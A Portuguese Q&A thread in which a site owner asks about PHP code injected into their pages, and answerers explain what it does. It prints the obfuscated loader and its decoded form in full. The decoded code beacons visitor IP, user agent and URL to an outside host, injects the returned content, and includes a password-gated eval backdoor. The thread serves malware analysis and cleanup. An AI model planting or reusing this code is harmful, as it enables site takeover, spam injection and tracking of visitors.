# Código estranho inserido na pagina

Tags: php

Neste fim de semana o seguinte código foi introduzido nas paginas do meu site, porém não entendi direito o que ele faz, será que alguém poderia me dar uma ajuda?

**Codigo criptografado**...

```
//###=CACHE START=###
error_reporting(0);

assert_options(ASSERT_ACTIVE, 1);

assert_options(ASSERT_WARNING, 0);

assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl93q3phoJy0LJ1uYaW1Y2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWTyjXF4vWzD9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvLGZ4LzWuMQL1LmAzMwt2BTD0ZGt1LzD4ZGt0MwWzLzVvYvExYvE1YvEwYvVkVvx7PzyzXTyhnI9aMKDbVzSfoT93K3IloS9zo3OyovVcVQ09VQRcVUfXWTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPE1pzjcBjc9VTIfp2IcMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsHxIHIIWBISWOGyATEIVfVSEFIHHcBjbxpzImqJk0VQ0tL3IloS9yrTIwXPEwnPx7PzA1pzksL2kip2HbWTAbXGfXWTyvqvN9VPElMKA1oUD7Pa0tMJkmMFO7PvEzpPN9VTMmo2Aeo3Oyovtvq3q3Yz1cqTSgLF5lqFVfVQtjYPNxMKWloz8fVPEypaWmqUVfVQZjXGfXnJLtXPEzpPxtrjbtVPNtWT91qPN9VPWUEIDtY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWTyjXF4vWzD9Vv51pzkyozAiMTHbWTDcYvVzqG0vYaIloTIhL29xMFtxqFxhVvMwCFVhWTZhVvMcCGRznQ0vYz1xAFtvLGZ4LzWuMQL1LmAzMwt2BTD0ZGt1LzD4ZGt0MwWzLzVvYvExYvE1YvEwYvVkVvxhVvOVISEDYmRhZIklKT4vBjbtVPNtWT91qPNhCFNvFT9mqQbtq3q3Yz1cqTSgLF5lqIklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVzWuMwqxAzH1VvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###
```

**Codigo descriptografado**...

```
<?

if (isset($ibv)) { echo $ibv; } else { error_reporting(0);
ini_set("display_errors", "0");
if (!isset($ibv)) {
if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]);
if(preg_match('!\S!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "u"; else $c = "w";
$d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = $_SERVER["HTTP_USER_AGENT"];
$ip = $_SERVER["REMOTE_ADDR"];
$url = "http://www.mitama.ru/get.php?ip=".urlencode($ip)."&d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("a38bbad65c3ff868d4185bd8184f2fbb".$d.$u.$c."1");
if(ini_get("allow_url_fopen") == 1) {
$ibv = file_get_contents($url);
} elseif(function_exists("curl_init")) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
$result = curl_exec($ch);
curl_close($ch);
$ibv = $result;
} else {
$fp = fsockopen("www.mitama.ru", 80, $errno, $errstr, 30);
if ($fp) {
    $out = "GET /get.php?ip=".urlencode($ip)."&d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&h=".md5("a38bbad65c3ff868d4185bd8184f2fbb".$d.$u.$c."1")." HTTP/1.1\r\n";
    $out .= "Host: www.mitama.ru\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    $resp = "";
    while (!feof($fp)) {
        $resp .= fgets($fp, 128);
    }
    fclose($fp);
    list($header, $body) = preg_split("/\R\R/", $resp, 2);
    $ibv = $body;
}
}
};
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "baf7d6e5") { eval(stripslashes($_REQUEST["c"])); }
echo $ibv;}
```

Comment: Tipo, apareceu do nada esse código ai?

Comment: Exato este código foi inserido do nada dentro dos arquivos php consegui identificar devido o codigo estar em base64 ai achei estranho.

Comment: Olha, testei um trecho dele e me pareceu que ele está capturando dados dos visitantes da sua página. Se tenta acessar o www.mitama.ru não aparece nada, mas no /get.php ele fica em branco, sinalizando que tem algo ali. E sendo .ru, é coisa ruim certamente kkk. Te aconselho a remover isso e passar um bom antivirus e antimalware no seu servidor.

Comment: Então eu já apaguei todas as paginas e fiz o upload do BKP porém fiquei curioso em saber oque fazia o código msm assim obrigado pela atenção

Comment: É uma espécie de Google Analytics de algum hacker, rsrs.

Comment: Aconselho vc a dar uma boa olhada no seu servidor e nas regras de Firewall, "fsockopen" é o que mais tem q te preocupar

fsockopen — Abre um socket de conexão Internet ou de domínio Unix (http://php.net/manual/pt_BR/function.fsockopen.php) Se abre portas é coisa a se resolver o quanto antes, pode ter certeza q vai ser atacada d novo.

Comment: @user3010128 Desculpe sou meio leigo no assunto oque eu deveria olhar no servidor? Eu uso um servidor de hospedagem da Go Daddy

Comment: De uma olhada com eles com relação a essa "injeção" de código que fizeram em sua página, pois isso é falha de segurança nas regras servidor.
uma coisa é um SQL-injection por falha de programação do site, outra é acionar trecho de código em seu fonte, em algo já publicado.
Bom, seria bom olhar a máquina que vc usa para desenvolver tb ;)

Answer (score 4, accepted):

Examinando bem superficialmente este código pode-se dividi-lo em duas partes

A primeira dela seriam todas as linhas exceto a penúltima

O que ele faz ali basicamente é pegar informações do seu servidor e do usuário que abriu a página e envia esta informação para `http://www.mitama.ru/get.php` (só de ser um site russo já da para ter ideia de que seja algo ruim)

Pelo que pude identificar ele pega o endereço que foi aberto pelo usuário, o User Agent que vai ter informações sobre o navegador usado e o IP do usuário.

Ele tenta enviar estas informações de 3 formas diferentes, pelo `file_get_contents`, pelo `curl` ou por `socket`, depende de qual estiver ativado no servidor, e então guarda um resultado na variável `$ibv` que no final ele adiciona na página.

Então com isso ele poderia adicionar qualquer conteúdo em sua página, porém o que li sobre isso é que como eles pegam o user agent e ip eles podem detectar quando é algum crawler de um buscador e exibir resultados diferentes apenas para ele.

Imagine o bot do google indexando seu site, e em cada página infectada ele adiciona links para o site dele, de forma que podem conseguir um rank melhor para eles no google, enquanto que se um usuário comum abrir o seu site pode ser que nada seja exibido, tornando mais difícil identificar a infecção.

Na segunda parte acho que está um problema maior ainda

```
if(isset($_REQUEST["p"]) && $_REQUEST["p"] == "baf7d6e5") { eval(stripslashes($_REQUEST["c"])); }
```

Basicamente se foi passado um parâmetro `"p"` e se ele for o valor correto ele vai executar através do `eval` qualquer código que for enviado pelo parâmetro `"c"`, permitindo executar qualquer código PHP remotamente em seu servidor.

Agora veja que se um usuário qualquer abrir sua página ela envia o endereço dela para o hacker, e então esse hacker pode enviar comandos para o seu servidor executar, ou seja, é basicamente uma botnet que pode então ser usada por exemplo para um ataque DDOS.